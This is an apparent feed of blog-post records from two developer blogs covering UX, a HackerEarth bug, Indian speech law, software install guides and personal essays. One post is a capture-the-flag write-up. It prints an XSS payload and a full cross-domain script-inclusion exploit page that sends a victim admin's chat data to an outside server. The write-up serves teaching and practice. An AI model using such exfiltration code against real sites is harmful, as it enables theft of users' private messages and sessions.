Philosophy\nThe epic Knuth vs McIlroy story\nZawinski’s Law\nhttp:\u002F\u002Fonethingwell.org\u002F\nWikipedia article on the topic is surprisingly good\nGood examples of pipes\nBooks\nThese are books I absolutely recommend every software developer read, in order.\nDon’t Make Me Think\nThe Pragmatic Programmer\nOther than these, I recommend reading Code Complete, Mythical Man Month, and everything by Jeff Atwood and Zach Holman, but only after you have read the above 2 books.\nHow to get better at Software Development?\nThis is just a small list of topics I cover in a recent blog post. This is only present\nin the updated version of the talk which I gave at GeekSkool. You can read the blog\npost here to look at the points I make.\nPhew. That was a lot of links. If you are ever interested in learning more about software development, feel free to contact me. If you ever feel like chatting with me, I’m usually online at chat.sdslabs.co.",[],{"slug":2787,"title":2788,"link":2789,"pubDate":2790,"contentSnippet":2791,"tags":2792,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"buxtons-rule","Buxton's Rule","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F03\u002F08\u002Fbuxtons-rule\u002F","2015-03-08T00:00:00.000Z","I consider myself a UX enthusiast; the term aptly describes my level of interest in UX. As I’m deeply involved in many UX and design decisions, I try to be well read on design and UX principles. 
While reading a discussion about iPhone prototypes on HN in June ‘12, I came across this comment:\nGoes to show what it takes to achieve excellence: lots of trial and error. Produce at least 3 alternatives for every design decision (Bill Buxton agrees).\n— mstuherl\nIt sounded so basic, yet often I see designers trying to defend their first design, because it seems good enough to them. No good design is ever born at the first step. Just like any other process, it takes multiple iterations to perfect it.\nI recently got in touch with Morgan (mstuherl on HN), and thanked him for his comment. Here’s what he said when I told him I wanted to dub it mstuherl’s rule:\nHah! My name’s Morgan, so you can call it Morgan’s Rule if you like, but it comes from Bill, so Buxton’s rule would be more appropriate. His book Sketching User Experience contains yet more wisdom!\nSo thats what I’m calling it:\nFurther Reading\nIteration in the Design of the Human-Computer Interface - Bill Buxton\nSketching User Experiences by Bill Buxton\nDon’t Make Me Think by Steve Krug (My first recommendation to every software dev\u002Fdesigner)",[],{"slug":2794,"title":2795,"link":2796,"pubDate":2797,"contentSnippet":2798,"tags":2799,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"scythe-ctf-updates","scytheCTF and Updates","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F02\u002F27\u002Fscythe-ctf-updates\u002F","2015-02-27T00:00:00.000Z","February has been an interesting month for me. I haven’t been programming a lot, but have definitely been writing a lot. I have got a few more upcoming projects as well, which I’d love to announce soon.\nWe recently held a short 8-hour CTF (scytheCTF) on Backdoor. I made two challenges for the CTF:\nSHITTY-OTP\nLOST-FOUND\nBoth of these problems were rush jobs because of several reasons:\nWe didn’t have much time to set the problems.\nWe didn’t expect much participation in scytheCTF.\nscytheCTF was a test CTF, just to figure out any issues with the internet launch of Backdoor.\nscythe is also supposed to be beginner friendly, unlike our annual BackdoorCTF, which will include much harder problems.\nI had a lot of fun with @kandoiabhi in setting the problems. It was also great seeing @DefConUA participate in such a small-scale contest.\nOther than scythe, we recently had our annual SDSLabs trip to Rishikesh, which I enjoyed a lot. I also wrote a small post on my work setup.",[],{"slug":2801,"title":2802,"link":2803,"pubDate":2804,"contentSnippet":2805,"tags":2806,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"hackerearth-bug","How I found a bug in HackerEarth","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F02\u002F12\u002Fhackerearth-bug\u002F","2015-02-12T00:00:00.000Z","Source\nI am not a competitive programmer. I love programming, but more so I love building things. As a result, I rarely participate in coding contests. Even when I do, I try to use languages like Ruby and Python just to see if I can do it my way, so to speak.\nWhile trying a contest in Ruby, I realized that I could not use the ruby prime library. This is a standard library in Ruby for a long while, and HackerEarth platform runs on 2.1.1, which is quite new.\nI reported this as a bug to HackerEarth in September ‘14. A quick reply from HE made me realize that they weren’t understanding the issue:\nModules like mathn or erb are part of standard library. 
They are available.\nTry using require ‘erb’ or require ‘mathn’ in the code editor.\nI decided to do some tests and check all standard libraries for their availability. For those unfamiliar with Ruby, this is how you load a standard library in Ruby:\nrequire 'prime'\nUsing the HackerEarth API, I was able to write some quick code that tested all expected libraries:\n\nwhile read lib; do\n  SOURCE=\"require%20'$lib'\"\n  echo \"Testing $lib\"\n  curl -s -d \"client_secret=API_SECRET&lang=RUBY&async=0&source=$SOURCE\" http:\u002F\u002Fapi.hackerearth.com\u002Fcode\u002Frun\u002F > $lib.json\ndone \u003C libs.txt\n\n\nHere libs.txt contains a list of all standard libraries. The above code is in bash, and makes use of curl. Parsing the results, I replied with the following:\nRequiring the following libraries raises a missing error:\ncoverage - RE\nHackerEarth admitted the issue (I posted code to replicate on github), and has since worked on it. I just ran the tests again, and only the following libraries are unavailable now:\ncurses - RE\nA few of these are understandable (win32, since the HE platform runs on Linux, and tk, which is a graphical library). A few of these are unavailable in Ruby 2.1.1 (I copied the list of libs from the 2.1.3 docs).\nKudos to HackerEarth for fixing a bug that very few of their users would have faced. All the source code for this post can be found at github.\nNote: This article was copied from HackerEarth because they are shutting down their notes platform.",[],{"slug":2808,"title":2809,"link":2810,"pubDate":2811,"contentSnippet":2812,"tags":2813,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"i-am-offended","I am offended","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F02\u002F06\u002Fi-am-offended\u002F","2015-02-06T00:00:00.000Z","To start with, here’s a piece of art that is meant to offend you:\n\nThe above is an artwork by MF Hussain. It was sold as an untitled work by Hussain to a private collector, but was named Bharat Mata later when it was sold in an auction.\nWere you offended by looking at it? Maybe.\nDoes it look vulgar and offensive to you? Perhaps.\nWhat should you do as a result?\nCLOSE THE TAB!\nSeriously, India. The right thing to do when you are offended is not to lynch a person to death, or to issue a fatwa against singing the national song. The right thing to do is this:\n\nThe right to get offended in India is a result of the way our constitution curbs the freedom of speech. However, these restrictions were not in the constitution that was passed when India was made a republic (26 Jan 1950). They were added by the First Amendment (ironic, I know), which passed in June 1951.\nIn the 18 months that passed between these two events, Indians had the right to absolute freedom of speech. I won’t go into the details of why both Nehru and Patel thought of bringing these restrictions (for the better of India), but needless to say, the reasons are no longer valid.\nHowever, I found a curious piece of irony while researching this:\nOne of the prime opponents of the First Amendment restrictions was Syama Prasad Mookerjee, a long-time RSS activist, founder of the Bharatiya Jana Sangh and widely regarded as the godfather of Hindu Nationalism.\nAnd now today, 64 years later, these restrictions are getting enacted into even more draconian laws. 
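Returning to the HackerEarth library test above: once the per-library JSON results are on disk, a rough pass can separate the available libraries from the missing ones. This is a hypothetical follow-up rather than the author’s actual parsing step, and the string it greps for (Ruby’s usual “cannot load such file” LoadError message) is an assumption about what the run output contains:\n\nfor f in *.json; do\n  lib=\"${f%.json}\"   # recover the library name from the file name\n  if grep -q \"cannot load such file\" \"$f\"; then\n    echo \"$lib - missing\"\n  else\n    echo \"$lib - available\"\n  fi\ndone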
One such law is Section 66A of the Information Technology Act.\nKapil Sibal, former union minister writes about it:\nAllowing the government to regulate the internet is a recipe for disaster. Government being what it is, it would use such power to further its own ends.\nHowever, he gives in to the diplomatic reasoning and writes further:\nI know where I stand. I am for freedom of expression, but there are no absolutes in life. Limitless freedom contains within it the seeds of conflict. We must eschew conflict and embrace freedom, for peace and harmony.\nNote that back in 2012, Kapil Sibbal had spoken in favor of Section 66A, citing it as a tool to protect women online. He seems to have reversed his stance since.\nThis is what Tushar Mehta, Additional Solicitor General has to say on the necessity of the act:\n[…] every institution and every person right from the President can be subjected to criticism and it is people’s fundamental right to free speech and expression but such rights do not cover grossly offensive comments and posts on social networking sites.\nAIB recently tested their rights by making a grossly offensive video and posting it on social networking sites. A lot of people were offended. The video was taken down as a result.\nDid the people who were offended see the video? Yes, probably on YouTube. But the recordings are still floating around, and are available on torrents very easily.\nYou see, the internet is a resilient beast. You can’t control it, or bend it to your will. It does not run by your rules, and your sense of sensibility. It has no concept of right or wrong. It just is.\nA nation where I am afraid to post critical views of the government or discuss events that might offend someone is not a nation worth living in.\nThe internet cannot be regulated. You might certainly think of it as possible, but we will always find a way.\nIf you are offended it is your problem, and frankly lots of things offend lots of people. - Salman Rushdie\nI don’t think I will ever see the first amendment repealed in my lifetime. 
However, I’m gonna try my very best to get the Supreme Court to re-evaluate Section 66A as unconstitional and over-reaching.\nIf you want to let the government know of your thoughts on the matter, the Assistant Solicitor General (representing the Government in the case) can be reached at tusharmehta64@yahoo.com.\nFurther Reading\nThis is a loose list of various references and readings on the topic.\nA Story of Censorship: How the Right to Take Offense is Shrinking Free Speech in India - A video seminar on the topic by Anuradha Raman, Outlook Magazine\nFirst Amendment of the Constitution of India\nWhy Nehru and Sardar Patel curbed freedom of expression in India - A nice summary of the events that lead to the passing of the First Amendment\nBharat Mata a work of art - A ruling by the Supreme Court declaring the topmost image in this post as a work of art, and that no one gets scandalized looking at art.\nRestrictions on freedom of speech in India\nAn excellent piece on abolishing the restrictions on free speech titled Of writers and poets who criticize with their pens (Rajeev Mantri)\nA few pieces on the ongoing panel: India Today, Indian Express, Firstpost’s Summary\nThanks to Shashank Mehta and Ravi Kishore for reviewing drafts of this.",[],{"slug":2815,"title":2816,"link":2817,"pubDate":2818,"contentSnippet":2819,"tags":2820,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"are-you-a-fighter-pilot","Are you a fighter pilot?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F01\u002F28\u002Fare-you-a-fighter-pilot\u002F","2015-01-28T00:00:00.000Z","As part of a pre job interview for a position as a security consultant, I was asked this question. The interviewer expanded the question further as :\nGiven the choice between a luxurious journey in a passenger jetliner (flying business class) and a thrilling trip as a fighter pilot, which one would you choose?\nMy immediate reply was (without a single doubt): “I’ll take the fighter jet, thanks.”\nThen the interviewer tried to dissuade me from my choice: “Its not as glamorous as it sounds. Its a terrible job flying a jet plane. There are lots of complications, you are literally defying death, and even the pay isn’t that good.”. He then spent quite some time explaining the luxuries and comforts that we take for granted in a passenger jet, and those that aren’t available in a fighter jet. “You can’t even piss properly”, he told me. “And there’s free booze on the Boeing.”\nMe (after some deliberation and moment of self-doubt): I’d ultimately like to have my own private jet, but I’m willing to strap myself to a 300 million dollar plane just trying to get there. I’d take that over a passenger jet any day.\nFor those who didn’t get the analogy: He was trying to convince me to join a high risk job, where I’d be working late nights doing what I love. But it also means giving up tons of luxuries and comforts that I could get at other companies.\nI’m sure that I’m the fighter jet kind of person, I’m just having difficulty deciding what jet I wanna fly. 
If you have an opening for a Full Stack Developer\u002FSecurity Consultant, shoot me a mail.",[],{"slug":2822,"title":2823,"link":2824,"pubDate":2825,"contentSnippet":2826,"tags":2827,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"yu-yureka","Yu were mislead","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F01\u002F13\u002Fyu-yureka\u002F","2015-01-13T00:00:00.000Z","I was eagerly awaiting the release of Yu Yureka, which has been widely hailed as a great budget phone by most reviews. I won’t go into the details of the phone, but rather the flash sale that took place on 13th Jan ‘15 (on amazon.in). Far from being a well-managed affair, the website was plagued with issues, and went down for everyone a couple of minutes before the sale.\nStill, a few lucky people were able to buy the phone (sadly, I wasn’t one of them). Micromax said that they had to close registrations for the sale early and had around 3 lakh people lined up for the sale.\nThis is how the yuplaygod.com homepage looks right now:\n\nClearly, they had 10k units for sale, and one in every 300 people should have bought it, right? Wrong!\nIt seems Yu (the brand new subsidiary of Micromax) is not above lying. There were only 3000 devices on sale today, out of which only 2657 were claimed, after which the sale was shut down.\nHow do I know this? The way deals work on amazon is once you are on a deal page, the client keeps checking the deal status every few seconds so as to let you know as soon as its status changes. This deal status response does not only include the deal status code (say EXPIRED\u002FSOLDOUT\u002FAVAILABLE), but also includes the deal’s nitty details.\nThese details include:\ntotalCouponCount: 3000\nclaimedCouponCount: 2657\npercentClaimed: 88\ntype: LIGHTNING_DEAL\ntitle: Yureka\ndealPrice: 8999\ncurrentPrice: 12999\nI’m not sure why Yu would try such a tactic (hype the device at low cost, overstate sales figures and then switch to a higher price), but it sure does not sound nice if you are one of the 3 lakh people who lined up to buy the device.\nReferences\nSince its my word against amazon, here’s a simple way to confirm the deal details for yourself:\nVisit http:\u002F\u002Fhurl.it\u002F (I don’t own this site)\nChange the request method to “POST” from “GET”\nEnter http:\u002F\u002Fwww.amazon.in\u002Fxa\u002Fdealcontent\u002Fv2\u002FGetDealStatus where it says yourapihere.com\nClick on “+ Add Body Button”\nPaste {\"requestMetadata\":{\"marketplaceID\":\"A21TJRUUN4KGV\",\"clientID\":\"goldbox\"},\"dealTargets\":[{\"dealID\":\"ea9fef51\",\"itemIDs\":null}]} into the box that appears\nClick on “Launch Request”\nScroll to the bottom to see the dealStatus\nAs an alternative, here is a permalink to the request.\nUpdate: If you try to replicate the above steps, you will notice that the deal response is now blank. My guess is that the deal was deleted from the servers. However, the permalinks above should still work. I’m still waiting for any official word from either Yu\u002FAmazon.\nHere’s a better (edited) photo that Yu might wanna use:\n\nThanks to Shashank Mehta for the title suggestion.",[],{"slug":2829,"title":2830,"link":2831,"pubDate":2832,"contentSnippet":2833,"tags":2834,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"thank-you-pat","Thank You Pat","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F01\u002F03\u002Fthank-you-pat\u002F","2015-01-03T00:00:00.000Z","I’m a lazy reader. 
I’ll often start books and leave them halfway, often juggling 3-4 books at the same time. I read in sprints, often spending a few days just finishing lots of books followed by reading nothing for the next few weeks, perhaps. But that doesn’t mean I don’t appreciate good books. This is the story of how I found my favorite writer, and how I discovered the wonderful books that I enjoy so deeply.\nI don’t write a journal regularly, but if I did, one of my favorite things to do with it is to figure out the little things that matter; to separate out the strands and understand the connections and the motivations behind where I am today\nIt is our choices…that show what we truly are, far more than our abilities.\nAlbus Dumbledore\nWhat I love to do is figure out those tiny choices, and the reasoning behind them that led me to today.\nI read Patrick Rothfuss’s “Name of the Wind” a long time back. It was an amazing book, which I found on a site called bestfantasybooks.com. In my defense, I was an avid Harry Potter fan at the time, looking for similar books, and I’d decided that reading the best fantasy would be good preparation before I could write my own.\nAs it so happens, “Name of the Wind” was a superb book. The kind that made me squirm in delight when I saw that the sequel was already out. So I did what any self-respecting book-lover would do: read it in a single stretch, screwing up my exams in the process. I didn’t sleep much for those few days (its a pretty long book), but I enjoyed every bit of it.\nI started following Pat’s (hilarious) blog, where he often posted tidbits of his life, and came across his review of “The Alloy of Law” by Brandon Sanderson:\n…\nMy last point is that Sanderson has now been added to a very short list of authors. Specifically, the list authors whom I wish to kill so that I might eat their livers and thereby gain their power.\nAny author that Patrick wanted to kill sounded like a great one to read, so I started “The Alloy of Law”. I finished the book in a few short hours. Its paced excellently, and the action keeps on coming. I’d never really read much urban fantasy before, and despite me never having read Mistborn (Alloy is a sequel to the Mistborn trilogy) I was sucked in.\nAnd here I am, counting down the next few days, waiting for the release of Firefight, Sanderson’s next book.\nSo, thank you Pat. Thanks for introducing me to my favorite writer. 
Thank you for writing those wonderful books, and keep on reviewing all that you love (I’m reading “Through the Woods” next).\nIf you are looking for a nice fat book to read next, I heartily recommend “The Name of the Wind” and “The Way of Kings”.",[],{"slug":2836,"title":2837,"link":2838,"pubDate":2839,"contentSnippet":2840,"tags":2841,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"installing-project-fedena-in-14-04-html","Installing Project Fedena in Ubuntu 14.04","https:\u002F\u002Faboobacker.in\u002F2014\u002F10\u002F30\u002Finstalling-project-fedena-in-14-04.html","2014-10-30T11:06:20.000Z","Modified version of the Fedena installation guide at the Project Fedena website\nInstall Ruby Dependencies\n\nsudo apt-get update\nsudo apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties\n\n\nInstall Ruby Using RVM\n\nsudo apt-get install libgdbm-dev libncurses5-dev automake libtool bison libffi-dev\ncurl -L https:\u002F\u002Fget.rvm.io | bash -s stable\nsource ~\u002F.rvm\u002Fscripts\u002Frvm\necho \"source ~\u002F.rvm\u002Fscripts\u002Frvm\" >> ~\u002F.bashrc\nrvm install 1.8.7\nrvm use 1.8.7 --default\nruby -v\n\n\nInstall Rails 2.3.5\n\ngem install rails -v 2.3.5\n\n\nSetting up MySQL server\nFedena uses MySQL, so run,\n\nsudo apt-get install libmysqlclient-dev mysql-server\n\n\nDo remember the MySQL password you set during this step; it is required later.\nClone Fedena Source Code\n\ngit clone https:\u002F\u002Fgithub.com\u002Fprojectfedena\u002Ffedena.git\n\n\nSet up your database details in database.yml\n\n\nOpen the file database.yml in the config folder of the Fedena source. 
Change the following details:\n\ndatabase: fedena - The name of the database you want to use for Fedena\n\nusername: root - MySQL username for Fedena\n\npassword: mypass - The password for the above MySQL user\n\n\nInstall the rest of the gems\n\ngem uninstall -i ~\u002F.rvm\u002Fgems\u002Fruby-1.8.7-head@global rake\ngem install rake -v 0.8.7\ngem install declarative_authorization -v 0.5.1\ngem install i18n -v 0.4.2\ngem install mysql\ngem install rush -v 0.6.8\ngem update --system 1.3.7\n\n\nSet up Fedena databases\nFrom the Fedena source directory, in a terminal run,\n\nrake db:create\nrake db:migrate\n\n\nfollowed by,\n\nrake fedena:plugins:install_all\n\n\nSet up PDF settings\n\nsudo apt-get install wkhtmltopdf\ncd config\u002Finitializers\ncp wicked_pdf.rb.example wicked_pdf.rb\nvi wicked_pdf.rb\n\n\nNow change :wkhtmltopdf => ‘\u002Fopt\u002Fwkhtmltopdf’, to :wkhtmltopdf => ‘\u002Fusr\u002Fbin\u002Fwkhtmltopdf’, and save the file.\nSetup Email\n\ncd config\ncp smtp_settings.yml.example smtp_settings.yml\nvi smtp_settings.yml\n\n\nAdd your settings and save the file.\nSetup SMS\n\ncd config\nvi sms_settings.yml\n\n\nAdd your settings and save the file.\nChange permissions for scripts\nFrom the same directory, grant executable permission to the files in the script directory:\n\nchmod +x script\u002F*\n\n\nRun the inbuilt server\nIf everything went fine till now, you are ready to run the Fedena server by running the following from the Fedena source folder:\n\nscript\u002Fserver\n\n\nNote: This guide is for setting up a development environment; for Fedena deployment, refer to Deploying Fedena in 14.04.",[],{"slug":2843,"title":2844,"link":2845,"pubDate":2846,"contentSnippet":2847,"tags":2848,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"ectf-web400-writeup","ECTF-14 Web400 Writeup","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F10\u002F20\u002Fectf-web400-writeup\u002F","2014-10-20T00:00:00.000Z","We recently participated in ECTF-14 and it was a great experience. Here’s a writeup for the web400 challenge:\nProblem Statement\nThe chat feature was added to the Facelook website and to test it, the founder of the company sent a chat message to the admin. Admin reads all the chat messages, but does not reply to anyone. Try to get that chat message and earn the bounty.\n[Annoying Admin]\nThe challenge consisted of a simple signup and a chat message sending feature, where anyone could send a chat message to anyone. However, on the loading side, the chat messages were loaded using JavaScript. The code for loading the messages looked like this:\n\nfunction load_messages (id) {\n    $.ajax({\n    url: \"http:\u002F\u002F212.71.235.214:4050\u002Fchat\",\n    data: {\n        sender: id,\n    },\n    success: function( response ) {\n        eval(response);\n    }\n    });\n}\n\n\nThe URL above responded with the following:\n\n$('#chat_234').html('');$('#chat_234').append('dream\u003Cbr \u002F>');\n\n\nwhere dream was the message I sent. My first attempt was to break out of the append function and execute my own JavaScript by trivially using a single quote. 
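Circling back to the Fedena database step above: put together, the edited database.yml ends up looking roughly like the sketch below. The development environment name and the adapter line are assumptions based on stock Rails 2.3 conventions (the guide itself only names the three values), and mypass is the guide’s placeholder:\n\ncat > config\u002Fdatabase.yml \u003C\u003C'EOF'\ndevelopment:\n  adapter: mysql     # assumption: the classic mysql adapter used by Rails 2.3\n  database: fedena   # the database Fedena will use\n  username: root     # MySQL username from the guide\n  password: mypass   # the password set while installing MySQL\nEOF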
Unfortunately, the single quote was escaped and removed by the backend.\nNext, I tried using &#x27; instead of a single quote, and it worked:\nMessage Sent: &#x27;+alert(1)+&#x27; \nMessage received: $('#chat_234').html('');$('#chat_234').append('dream\u003Cbr \u002F>');$('#chat_234').append(''+alert(1)+'\u003Cbr \u002F>');\nThis seemed simple enough to exploit as XSS, so I quickly wrote up my exploit:\n$.get(‘\u002Fchat?sender=2’, function(data){\n  $.post(“http:\u002F\u002Fmy-server.com\u002Fectf\u002Findex.php”, {content: data});\n});\nThis utilized the fact that we knew Founder’s user id to be 2. The code worked perfectly fine with my test accounts, but something weird happened when the challenge server (admin) ran it. I would get a GET request on the above mentioned url, instead of a POST. Also attempting to generate the URL using concat or + or any operator such as : \"http:\u002F\u002Fmy-server.com\u002Findex.php?data=\"+document.cookie made a request to http:\u002F\u002Fmy-server.com\u002Findex.php?data=. Anything I appended was just ignored, plain and simple.\nAfter attempting to get a POST request with cookie or session data for a lot of time, I realized that the problem was not XSS, but rather a CSRF attack. This was because the data was being loaded in a Javascript request, instead of JSON. Javascript request (using a script tag) can be made across domains, which meant that any website could access the data by using the proper script tag. We just had to add a script tag with its src set to http:\u002F\u002F212.71.235.214:4050\u002Fchat?sender=2. This would automatically add the chat message to a div with id chat_2.\nThe only issue was that Admin had to visit our site, with proper cookies, and we know already that admin has been sniffing for links and visiting them. So I wrote up my second (this time working) exploit:\n\n\u003C!DOCTYPE html>\n\u003Chtml lang=\"en\">\n\u003Chead>\n  \u003Cmeta charset=\"utf-8\">\n  \u003Ctitle>ECTF14 web400 exploit\u003C\u002Ftitle>\n\u003C\u002Fhead>\n\u003Cbody>\n  \u003Cdiv id=\"chat_2\">\u003C\u002Fdiv>\n  \u003Cdiv id=\"chat_106\">\u003C\u002Fdiv>\n  \u003Cscript src=\"http:\u002F\u002Fcode.jquery.com\u002Fjquery-1.11.0.min.js\">\u003C\u002Fscript>\n  \u003Cscript>\n    $(document).ready(function(){\n      $.getScript(\"http:\u002F\u002F212.71.235.214:4050\u002Fchat?sender=2\");\n      setTimeout(function(){\n        var text = $('#chat_2').text();\n        $.post('http:\u002F\u002F20c7d53b.ngrok.com\u002F', {content:text});\n      }, 1000);\n    })\n  \u003C\u002Fscript>\n\u003C\u002Fbody>\n\u003C\u002Fhtml>\n\n\nUnfortunately, the exploit did not work on Chrome because Chrome refused to run the script as javascript, because it was being served with a mime-type of text\u002Fhtml. It worked in firefox, and I crossed my fingers as I sent out the link to the above page to admin in a chat message. I knew admin user was using PhantomJS to run my javascript (because of the user-agent in numerous GET requests I got earlier). 
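While waiting, it helps to have something already listening for that request. The author used an ngrok URL; as a purely local stand-in, a bare netcat listener is enough to dump one raw incoming POST, flag and all. A sketch (the port is arbitrary, and some netcat builds want -l without -p):\n\nnc -l -p 8080   # prints the raw HTTP POST from the admin’s browser, then exits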
So, I was hopeful that this would work.\nI was listening at the URL, and sure enough, as soon as I sent a link to this page, the admin ran my JavaScript and I got the flag in a POST request.\nThe flag was bad_js_is_vulnerable.",[],{"slug":2850,"title":2851,"link":2852,"pubDate":2853,"contentSnippet":2854,"tags":2855,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"apertium-malayalam-english-pair-tools-usage-and-directory-structure-html","Apertium Malayalam-english Pair Tools Usage and Directory Structure","https:\u002F\u002Faboobacker.in\u002F2014\u002F08\u002F20\u002Fapertium-malayalam-english-pair-tools-usage-and-directory-structure.html","2014-08-20T02:03:25.000Z","The Apertium Malayalam-English pair contains two directories:\napertium-mal -> contains Malayalam-specific rules and resources\napertium-mal-eng -> contains translation rules\nApertium-mal\napertium-mal.mal.lexc -> contains the monolingual dictionary in lexc format; it contains the morphotactic rules\napertium-mal.mal.twol -> contains morphophonology rules (changes when morphemes are joined together)\napertium-mal.mal.tsx -> tag set to train the tagger\napertium-mal.mal.rlx -> constraint grammar rules\nApertium-mal-eng\napertium-mal-eng.eng.dix -> monolingual dictionary for English in lttoolbox format\napertium-mal-eng.post-eng.dix -> English post-generator\napertium-mal-eng.eng-mal.t1x -> English to Malayalam chunker\napertium-mal-eng.eng-mal.t2x -> English to Malayalam interchunk\napertium-mal-eng.eng-mal.t3x -> English to Malayalam postchunk\nTranslation\n\ncd apertium-mal-eng\necho “മലയാളം വാക്യം ” | apertium -d . mal-eng\n\n\nwhere\n-d . -> directory = current directory\nmal-eng -> Malayalam-English mode\nMorphological analyser\n\necho “മലയാളം “| lt-proc mal-eng.automorf.bin\n\n\nGUI for translator\n\nStep-by-step process view (Developer -> Modes viewer)",[],{"slug":2857,"title":2858,"link":2859,"pubDate":2860,"contentSnippet":2861,"tags":2862,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"install-apertium-malayalam-english-pair-development-environment-in-ubuntu","Install Apertium Malayalam-english Pair Development Environment in Ubuntu","https:\u002F\u002Faboobacker.in\u002F2014\u002F08\u002F20\u002Finstall-apertium-malayalam-english-pair-development-environment-in-ubuntu.html","2014-08-20T01:43:36.000Z","Apertium is an open source machine translation toolkit. It is an extensible platform, so new language pairs can be added easily. The pair is currently in the incubator stage, and we have to do a lot to make it useful for translating real-life examples. 
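Before the install steps, a quick preview of where this ends up: once the pair is compiled, the same mal-eng mode can be driven in a loop to translate a whole file. A sketch (sentences.txt is a hypothetical file with one Malayalam sentence per line):\n\ncd apertium-mal-eng\nwhile IFS= read -r line; do\n  echo \"$line\" | apertium -d . mal-eng   # -d . picks up the modes in this directory\ndone \u003C sentences.txt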
I created PPAs for the tools to make the process easier.\nPlatform: Ubuntu 14.04\nAdd repositories\n\nwget http:\u002F\u002Fapertium.projectjj.com\u002Fapt\u002Finstall-nightly.sh -O - | sudo bash\nsudo add-apt-repository ppa:tinodidriksen\u002Fcg3\n\n\nInstall tools\n\nsudo apt-get update\nsudo apt-get -f install locales build-essential automake subversion pkg-config gawk libtool apertium-all-dev\n\n\n\nInstall English-Malayalam pair data\n\n\nsvn co https:\u002F\u002Fsvn.code.sf.net\u002Fp\u002Fapertium\u002Fsvn\u002Fincubator\u002Fapertium-mal-eng\u002F\nsvn co https:\u002F\u002Fsvn.code.sf.net\u002Fp\u002Fapertium\u002Fsvn\u002Fincubator\u002Fapertium-mal\n\n\nCompile\n\ncd ~\u002Fapertium-mal\n.\u002Fautogen.sh\nmake\ncd ~\u002Fapertium-mal-eng\n.\u002Fautogen.sh --with-lang1=..\u002Fapertium-mal\nmake\n\n\nInstallation is over; now you can test the system using\n\necho \" അവന്‍ നല്ല കുട്ടിയാണ്  \" | apertium -d . mal-eng\n\n\nThis will print\nhe is nice child\nPrefer a graphical user interface? You can try my simple GUI for it:\n\nsudo apt-get install qt5-default espeak\ngit clone https:\u002F\u002Fgithub.com\u002Ftachyons\u002Fmltranslator.git\ncd mltranslator\nqmake\nmake\nsudo make install\n\n\nStuck? Don’t worry, just comment below. :-)",[],{"slug":2864,"title":2865,"link":2866,"pubDate":2867,"contentSnippet":2868,"tags":2869,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"my-public-life","Living a public life as a privacy advocate","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F08\u002F14\u002Fmy-public-life\u002F","2014-08-14T00:00:00.000Z","If you’ve known me for a while, you might know me as a privacy-conscious individual or perhaps as someone who leads a very public life. The truth is that I lead both these lives; and while that may sound oxymoronic to some, it’s perfectly clear to me.\nI’m a huge privacy advocate. I still remember the day I woke up and read about PRISM first thing in the morning. My reaction was a mix of disbelief, anger, and frustration. In the aftermath of the PRISM reveal, I made a few choices: I would retain ownership of my data, and I’ll do whatever I can to promote tools that help you do this.\nI’m still working on both fronts, but the reality of the situation is that we are surrounded by walled gardens. I decided to make the best I could of these gardens. I remember reading a weird suggestion: only post public stuff on facebook; and I was somehow convinced to try it out.\nBut I took the experiment a step further. If the service is something I can’t control myself (i.e., not self-hosted), everything I do with it should be for public viewing. Since then, I’ve rarely posted anything private on facebook.\nOther services where I follow the same advice include:\nGoodreads - Whatever I read is public information, along with real-time updates of my reading habits.\nLast.FM - All my music tastes, along with real-time updates on what I’m listening to.\nFacebook - All of my posts on facebook are public. I do have some private messaging interactions on facebook (I never initiate them) and usually move them to email if they grow important.\nTwitter - Tiny byte-sized thoughts and observations are again, public. My account is set to public, which doesn’t mean that I trust twitter with my data. It just means that I expect my data to be public.\nGitHub - One of the few companies I trust to keep my data safe. Barring a few exceptions, everything I do on github is public, ready for anyone to analyze and use as public data. 
In fact, github makes all of its timeline data available to public as a dataset on bigquery.\nBookmarks - Most of my bookmarks are public via xmarks. I haven’t synced it in a while since XMarks and Chrome Sync don’t work well together, but plan to do something about this as well.\nAlong with all this, most of the writing I do these days is for public consumption, either via my Blog, or some platform like Quora, StackExchange, or Medium.\nWhy\nMy reasoning behind keeping all of my online life public is twofold:\nThis creates a public archive of my life, accessible to everyone.\nIt doesn’t give me an illusion of privacy when there is none.\nIn reference to (1) above, I recently setup Google Inactive Accounts, and have to commend Google on the execution of the concept. Be sure to check it out at https:\u002F\u002Fwww.google.com\u002Fsettings\u002Faccount\u002Finactive.\nDisadvantages\nThis lifestyle choice is not without its comebacks. Stalking me, for example, is very easy. So is probably impersonating me as well. However, these are risks I’m willing to take in order to lead a public life.\nExceptions\nBy now you might be thinking of me as a pro-facebook share-everything kind of guy. But that’s not completely true. I do have clear limits on what counts as public and what does not. I value my privacy (and that of those close to me) very dearly.\nFor instance, I count my photographs as something very private. I almost never post public updates anywhere with my picture in it. Perhaps its because I never had any phone with decent camera. Whatever the reason, I try really hard to keep my pictures off the internet.\nAnother related issue is when the update would involve someone beside me. For 